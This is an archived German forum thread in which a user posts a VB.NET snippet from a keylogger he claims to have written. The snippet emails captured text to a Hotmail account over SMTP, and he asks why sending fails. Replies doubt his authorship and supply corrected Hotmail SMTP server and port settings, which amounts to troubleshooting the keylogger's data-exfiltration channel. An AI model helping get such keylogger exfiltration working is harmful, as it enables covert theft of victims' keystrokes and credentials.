PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : SMTP Keylogger VB 2008



latinovic
25.07.2009, 23:52
Hallo Leutz..

Ich habe mir heute mit Visual Basic einen Keylogger programmiert und gecodet ..
ich benutze smtp server als server Programm ..
Der Keylogger funktioniert 99% bis zum Letzten Punkt dann steht da .. email konnte nicht gesendet werde .. Ich habe in meinem Router den Port Freigeschaltet aber ich weiss nicht wie ich das bei meinem Programm smtp server einstellen muss .
ich benutze advanced smtp server 5.5

hier ist mein selbst gecodeter code..

Imports System.Web
Imports System.IO
Imports System.Net.Mail

Public Class Form1


Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim mail As New MailMessage()
Dim SmtpServer As New SmtpClient
SmtpServer.Credentials = New Net.NetworkCredential("xxxxxxxxxxxxxx@hotmail.com" , "(mein passwort)")
SmtpServer.Port = 461
SmtpServer.Host = "smtp.hotmail.de"
SmtpServer.EnableSsl = True
SmtpServer.EnableSsl = True
mail.To.Add("xxxxxxxxxxxxx@hotmail.de")
mail.From = New MailAddress("xxxxxxxxxxxxxx1@hotmail.com")
mail.Subject = "(mein Passwort)"
mail.Body = RichTextBox1.Text
SmtpServer.Send(mail) ( hier zeigt der immer den fehler an .. failed to send mail )

End Sub

End Class


wisst ihr etwa was ich falsch gemacht haben könnte ?


Habe ich falsch gecodet oder habe ich mein smtp server programm falsch eingestellt ..

Danke im Vorraus..

enco
25.07.2009, 23:58
Entweder postest du den ganzen Code oder ich mach hier zu.
Mit dem Zeug kann doch niemand was anfangen O_o

Zer0Flag
26.07.2009, 00:37
Ich bin mir nicht sicher aber bei Web.de ist es zumindest so das der Absender die gleiche Adresse haben muss wie das Konto von dem die Mail gesended wird. Und laut Google is der SMTP Port von Hotmail nicht 461 sondern 25.


greetz Zer0Flag

inmate
26.07.2009, 02:14
Den hast du nie im leben gecodet.Alleine wie du deine Sätze formulierst und was deine Sätze für eine Logik ergeben ist zum schrott lachen.Du weist garnicht was du da redest.



Ich habe mir heute mit Visual Basic einen Keylogger programmiert und gecodet ..

programmieren und coden ist das selbe



habe in meinem Router den Port Freigeschaltet aber ich weiss nicht wie ich das bei meinem Programm smtp server einstellen muss .

beim Keylogger muss man keinen port freischalten


hier ist mein selbst gecodeter code..


rofl , dazu sage ich mal nichts denn exact den selben Code gibt es auf HackHound.

Gebe doch Credits und sage nicht das es deiner ist , das wird im Endefekt eh nur peinlich für dich.

Probiere den Mail Versand mal mit googlemail.

Kolabi
26.07.2009, 10:23
Posteingang : pop3.live.com (SSL; Port 995)



Postausgang : smtp.live.com (TLS; Port 25)



Benutzername : Vollständige Hotmail-E-Mail-Adresse



Besonderheiten : Verwendet SMTP-Authentifizierung.POP3 und SMTP laufen über TLS- bzw. SSL-Verschlüsselung.



Quelle :http://www.patshaping.de/hilfen_ta/pop3_smtp.htm

Du hast einen falschen Port etc. angegeben. Änder einfach die Daten und dann sollte es mit dem Versenden klappen.